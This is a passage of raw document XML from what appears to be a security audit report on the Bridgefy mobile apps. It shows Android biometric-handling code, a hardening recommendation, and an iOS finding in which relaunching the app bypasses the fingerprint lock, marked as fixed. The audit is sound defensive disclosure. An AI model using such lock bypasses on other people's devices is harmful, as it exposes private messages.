        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.onAuthenticationSucceeded(result)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mListener?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>onBiometricSuccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="369" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/app/src/main/kotlin/me/bridgefy/main/ux/settings/ui/settings/Setting sFragment.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>onBiometricSuccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1511" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>binding.fingerprintSwitch.isChecked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>viewModel.fingerPrint(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to improve the implementation of this feature so the app remains locked. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>keystorecrypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> app can be reviewed for a correct implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250046" w:id="9"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-018</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Biometric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Flaw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid. Bridgefy iOS 1.0.0 build 274 was found to implement the proposed mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The iOS app implements a feature whereby the app locks itself when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>switches to another app. The user is then required to validate the fingerprint to access the authenticated portion of the application. It was found that this feature can be trivially bypassed by closing and launching the app again. A malicious attacker, with access to an unlocked phone,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leverage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>weakness</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authenticated screens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of the iOS app. Please note this level of access reveals direct user messages, as well as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>broadcast</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>alternative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>confirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>already,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ID.</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0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487596032">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>164047</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="29" name="Graphic 29"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="29" name="Graphic 29"/>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2.917163pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15720448;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape20" coordorigin="1440,258" coordsize="2880,0" path="m1440,258l4320,258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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId53">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/FSecureLABS/android-keystore-audit/.../keystorecrypto</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="74"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1572"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4400550" cy="3781425"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="30" name="Group 30"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvPr id="30" name="Group 30"/>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4400550" cy="3781425"/>
                          <a:chExt cx="4400550" cy="3781425"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="31" name="Image 31"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId54" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2181225" cy="3781425"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="32" name="Image 32"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId55" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2219325" y="0"/>
                            <a:ext cx="2181225" cy="3781425"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group style="width:346.5pt;height:297.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" id="docshapegroup21" coordorigin="0,0" coordsize="6930,5955">
                <v:shape style="position:absolute;left:0;top:0;width:3435;height:5955" type="#_x0000_t75" id="docshape22" stroked="false">
                  <v:imagedata r:id="rId54" o:title=""/>
                </v:shape>
                <v:shape style="position:absolute;left:3495;top:0;width:3435;height:5955" type="#_x0000_t75" id="docshape23" stroked="false">
                  <v:imagedata r:id="rId55" o:title=""/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="74"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Profile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
